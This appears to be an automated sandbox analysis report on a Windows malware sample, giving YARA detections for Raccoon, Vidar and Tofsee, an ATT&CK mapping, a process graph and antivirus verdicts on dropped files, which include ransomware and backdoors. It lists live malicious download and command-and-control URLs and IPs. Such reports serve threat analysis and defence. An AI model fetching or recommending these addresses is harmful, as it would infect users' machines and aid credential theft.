                          Source: Yara matchFile source: 1.2.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.1.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 12.2.ujhcrda.5315a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.ujhcrda.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.0Cjy7Lkv1A.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.0Cjy7Lkv1A.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.419458917.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.404651747.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.419524662.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.471381402.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.471483923.0000000000491000.00000004.00020000.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 0000002C.00000002.738735707.0000000004DD0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000003.564687179.0000000004E70000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.629029283.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000011.00000002.474690379.0000000000571000.00000004.00000020.sdmp, type: MEMORY
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.a50000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.670e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.550e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.eb0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.eb0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.3.szdcdkt.exe.690000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 39.2.svchost.exe.a50000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 36.2.szdcdkt.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.A8FB.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.A8FB.exe.570000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000024.00000003.507342269.0000000000690000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.499421318.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.511069227.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.510317453.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.480122610.0000000000570000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000024.00000002.510779082.0000000000670000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000027.00000002.631897455.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.501018079.0000000000550000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A8FB.exe PID: 4692, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: szdcdkt.exe PID: 2972, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6780, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\A8FB.exeCode function: 19_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\uuqefjyt\szdcdkt.exeCode function: 36_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 39_2_00A588B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1Native API541DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsExploitation for Client Execution1Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothIngress Tool Transfer15Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsCommand and Scripting Interpreter2Windows Service14Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationEncrypted Channel22Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsService Execution3Logon Script (Mac)Windows Service14Software Packing33NTDSSystem Information Discovery237Distributed Component Object ModelInput CaptureScheduled TransferNon-Standard Port1SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon ScriptProcess Injection713Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol5Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSecurity Software Discovery551VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol36Jamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemVirtualization/Sandbox Evasion241Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion241Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection713KeyloggingSystem Network Configuration Discovery1Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552945 Sample: 0Cjy7Lkv1A.exe Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 87 185.163.45.70, 80 MIVOCLOUDMD Moldova Republic of 2->87 89 185.163.204.22, 49890, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 2->89 91 12 other IPs or domains 2->91 113 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->113 115 Antivirus detection for URL or domain 2->115 117 Multi AV Scanner detection for dropped file 2->117 119 20 other signatures 2->119 11 0Cjy7Lkv1A.exe 2->11         started        14 szdcdkt.exe 2->14         started        16 ujhcrda 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 151 Contains functionality to inject code into remote processes 11->151 153 Injects a PE file into a foreign processes 11->153 21 0Cjy7Lkv1A.exe 11->21         started        155 Detected unpacking (changes PE section rights) 14->155 157 Detected unpacking (overwrites its own PE header) 14->157 159 Writes to foreign memory regions 14->159 161 Allocates memory in foreign processes 14->161 24 svchost.exe 14->24         started        163 Machine Learning detection for dropped file 16->163 27 ujhcrda 16->27         started        93 127.0.0.1 unknown unknown 18->93 29 WerFault.exe 18->29         started        signatures6 process7 dnsIp8 141 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->141 143 Maps a DLL or memory area into another process 21->143 145 Checks if the current machine is a virtual machine (disk enumeration) 21->145 31 explorer.exe 10 21->31 injected 95 microsoft-com.mail.protection.outlook.com 104.47.54.36, 25, 49816 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 24->95 97 patmushta.info 8.209.67.104, 443, 49825, 49910 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 24->97 147 System process connects to network (likely due to code injection or exploit) 24->147 149 Creates a thread in another existing process (thread injection) 27->149 signatures9 process10 dnsIp11 99 185.233.81.115, 443, 49771 SUPERSERVERSDATACENTERRU Russian Federation 31->99 101 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 31->101 103 10 other IPs or domains 31->103 73 C:\Users\user\AppData\Roaming\ujhcrda, PE32 31->73 dropped 75 C:\Users\user\AppData\Local\Temp\B3BA.exe, PE32 31->75 dropped 77 C:\Users\user\AppData\Local\Temp\A8FB.exe, PE32 31->77 dropped 79 10 other malicious files 31->79 dropped 105 System process connects to network (likely due to code injection or exploit) 31->105 107 Benign windows process drops PE files 31->107 109 Deletes itself after installation 31->109 111 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->111 36 7063.exe 31->36         started        39 A8FB.exe 2 31->39         started        42 B3BA.exe 3 31->42         started        44 60C2.exe 31->44         started        file12 signatures13 process14 file15 121 Detected unpacking (changes PE section rights) 36->121 123 Detected unpacking (overwrites its own PE header) 36->123 125 Found evasive API chain (may stop execution after checking mutex) 36->125 139 4 other signatures 36->139 81 C:\Users\user\AppData\Local\...\szdcdkt.exe, PE32 39->81 dropped 127 Machine Learning detection for dropped file 39->127 129 Uses netsh to modify the Windows network and firewall settings 39->129 131 Modifies the windows firewall 39->131 46 cmd.exe 1 39->46         started        49 cmd.exe 2 39->49         started        51 sc.exe 1 39->51         started        59 3 other processes 39->59 83 C:\Users\user\AppData\Local\...\B3BA.exe.log, ASCII 42->83 dropped 133 Antivirus detection for dropped file 42->133 135 Injects a PE file into a foreign processes 42->135 53 B3BA.exe 42->53         started        55 B3BA.exe 42->55         started        137 Multi AV Scanner detection for dropped file 44->137 57 WerFault.exe 23 9 44->57         started        signatures16 process17 file18 85 C:\Windows\SysWOW64\...\szdcdkt.exe (copy), PE32 46->85 dropped 61 conhost.exe 46->61         started        63 conhost.exe 49->63         started        65 conhost.exe 51->65         started        67 conhost.exe 59->67         started        69 conhost.exe 59->69         started        71 conhost.exe 59->71         started        process19

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          0Cjy7Lkv1A.exe38%VirustotalBrowse
                          0Cjy7Lkv1A.exe54%ReversingLabsWin32.Trojan.DllCheck
                          0Cjy7Lkv1A.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\B3BA.exe100%AviraHEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\8008.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\A8FB.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\9874.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\7063.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\382E.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\szdcdkt.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\B3BA.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\60C2.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\8B25.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\6674.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\5126.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1BCC.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\ujhcrda100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1BCC.exe63%ReversingLabsWin32.Ransomware.StopCrypt
                          C:\Users\user\AppData\Local\Temp\382E.exe29%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\382E.exe81%ReversingLabsWin32.Trojan.Raccrypt
                          C:\Users\user\AppData\Local\Temp\60C2.exe46%MetadefenderBrowse
                          C:\Users\user\AppData\Local\Temp\60C2.exe77%ReversingLabsWin32.Trojan.Raccoon
                          C:\Users\user\AppData\Local\Temp\6674.exe46%ReversingLabsWin32.Trojan.Fragtor
                          C:\Users\user\AppData\Local\Temp\8008.exe63%ReversingLabsWin32.Ransomware.StopCrypt

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          17.3.7063.exe.4a0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          14.2.60C2.exe.2080e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          36.2.szdcdkt.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          42.0.B3BA.exe.9b0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          14.3.60C2.exe.2090000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          13.0.ujhcrda.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          41.2.B3BA.exe.250000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          20.0.B3BA.exe.370000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          36.2.szdcdkt.exe.670e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.2.0Cjy7Lkv1A.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          13.1.ujhcrda.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          42.2.B3BA.exe.400000.0.unpack100%AviraHEUR/AGEN.1145065Download File
                          1.0.0Cjy7Lkv1A.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          42.0.B3BA.exe.9b0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          20.0.B3BA.exe.370000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          20.0.B3BA.exe.370000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          42.0.B3BA.exe.400000.4.unpack100%AviraHEUR/AGEN.1145065Download File
                          42.0.B3BA.exe.400000.10.unpack100%AviraHEUR/AGEN.1145065Download File
                          20.2.B3BA.exe.370000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          42.0.B3BA.exe.400000.8.unpack100%AviraHEUR/AGEN.1145065Download File
                          42.0.B3BA.exe.9b0000.7.unpack100%AviraHEUR/AGEN.1211353Download File
                          14.0.60C2.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          17.2.7063.exe.480e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          42.0.B3BA.exe.9b0000.5.unpack100%AviraHEUR/AGEN.1211353Download File
                          42.0.B3BA.exe.400000.6.unpack100%AviraHEUR/AGEN.1145065Download File
                          42.0.B3BA.exe.400000.12.unpack100%AviraHEUR/AGEN.1145065Download File
                          42.0.B3BA.exe.9b0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          41.0.B3BA.exe.250000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          13.0.ujhcrda.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          20.0.B3BA.exe.370000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          13.0.ujhcrda.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          36.3.szdcdkt.exe.690000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          13.2.ujhcrda.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          14.2.60C2.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          42.0.B3BA.exe.9b0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          36.2.szdcdkt.exe.eb0000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                          14.0.60C2.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          14.0.60C2.exe.2080e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          42.2.B3BA.exe.9b0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          19.2.A8FB.exe.550e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          41.0.B3BA.exe.250000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          39.2.svchost.exe.a50000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          41.0.B3BA.exe.250000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.0Cjy7Lkv1A.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          42.0.B3BA.exe.9b0000.9.unpack100%AviraHEUR/AGEN.1211353Download File
                          12.2.ujhcrda.5315a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          0.2.0Cjy7Lkv1A.exe.4615a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          41.0.B3BA.exe.250000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          42.0.B3BA.exe.9b0000.13.unpack100%AviraHEUR/AGEN.1211353Download File
                          14.0.60C2.exe.2080e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          19.3.A8FB.exe.570000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          42.0.B3BA.exe.9b0000.11.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.1.0Cjy7Lkv1A.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.0Cjy7Lkv1A.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          17.2.7063.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          19.2.A8FB.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                          http://185.7.214.171:8080/6.php100%URL Reputationmalware
                          http://tempuri.org/0%URL Reputationsafe
                          http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                          http://185.163.204.24/4%VirustotalBrowse
                          http://185.163.204.24/0%Avira URL Cloudsafe
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a40%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                          http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8e0%Avira URL Cloudsafe
                          https://api.ip.sb/ip0%URL Reputationsafe
                          http://crl.ver)0%Avira URL Cloudsafe
                          http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                          http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                          http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                          http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                          https://www.tiktok.com/legal/report0%URL Reputationsafe
                          http://tempuri.org/Entity/Id13Response0%URL Reputationsafe
                          http://tempuri.org/Entity/Id22Response0%URL Reputationsafe
                          https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                          https://get.adob0%URL Reputationsafe
                          http://tempuri.org/Entity/Id18Response0%URL Reputationsafe
                          https://disneyplus.com/legal.0%URL Reputationsafe
                          http://tempuri.org/Entity/Id3Response0%URL Reputationsafe

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          s3-w.us-east-1.amazonaws.com
                          		54.231.194.41
                          		truefalse
                            		high
                            bitbucket.org
                            		104.192.141.1
                            		truefalse
                              		high
                              pool-fr.supportxmr.com
                              		149.202.83.171
                              		truefalse
                                		high
                                unicupload.top
                                		54.38.220.85
                                		truefalse
                                  		high
                                  host-data-coin-11.com
                                  		93.189.42.167
                                  		truefalse
                                    		high
                                    patmushta.info
                                    		8.209.67.104
                                    		truefalse
                                      		high
                                      cdn.discordapp.com
                                      		162.159.134.233
                                      		truefalse
                                        		high
                                        microsoft-com.mail.protection.outlook.com
                                        		104.47.54.36
                                        		truefalse
                                          		high
                                          goo.su
                                          		104.21.38.221
                                          		truefalse
                                            		high
                                            transfer.sh
                                            		144.76.136.153
                                            		truefalse
                                              		high
                                              a0621298.xsph.ru
                                              		141.8.194.74
                                              		truefalse
                                                		high
                                                data-host-coin-8.com
                                                		93.189.42.167
                                                		truefalse
                                                  		high
                                                  bbuseruploads.s3.amazonaws.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    pool.supportxmr.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://185.7.214.171:8080/6.phptrue
                                                      • URL Reputation: malware
                                                      		unknown
                                                      http://185.163.204.24/false
                                                      • 4%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://a0621298.xsph.ru/advert.msifalse
                                                        		high
                                                        http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/4457553c06dee2e98e4f451cad0abfa16d7760a4false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/e946ea03b0a56043b0189e637403106a5b3aad8efalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://a0621298.xsph.ru/9.exefalse
                                                          		high
                                                          http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          http://a0621298.xsph.ru/45512.exefalse
                                                            		high
                                                            http://data-host-coin-8.com/game.exefalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://a0621298.xsph.ru/443.exefalse
                                                              		high
                                                              http://a0621298.xsph.ru/File.exefalse
                                                                		high

                                                                URLs from Memory and Binaries

                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/02/sc/sctB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://duckduckgo.com/chrome_newtabB3BA.exe, 0000002A.00000002.698077614.000000000305F000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.748298301.0000000003345000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.745378039.0000000003308000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://duckduckgo.com/ac/?q=B3BA.exe, 0000002A.00000002.701761564.000000000309E000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://tempuri.org/Entity/Id12ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://tempuri.org/B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://tempuri.org/Entity/Id2ResponseB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Entity/Id21ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://support.google.com/chrome/?p=plugin_realB3BA.exe, 0000002A.00000002.753014761.0000000003403000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.726282162.0000000003230000.00000004.00000001.sdmp, B3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/faultB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsatB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://tempuri.org/Entity/Id15ResponseB3BA.exe, 0000002A.00000002.648719178.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyB3BA.exe, 0000002A.00000002.664507958.0000000002F34000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.373648113.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.391811922.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.403574937.000000000095C000.00000004.00000020.sdmpfalse
                                                                                                        		high
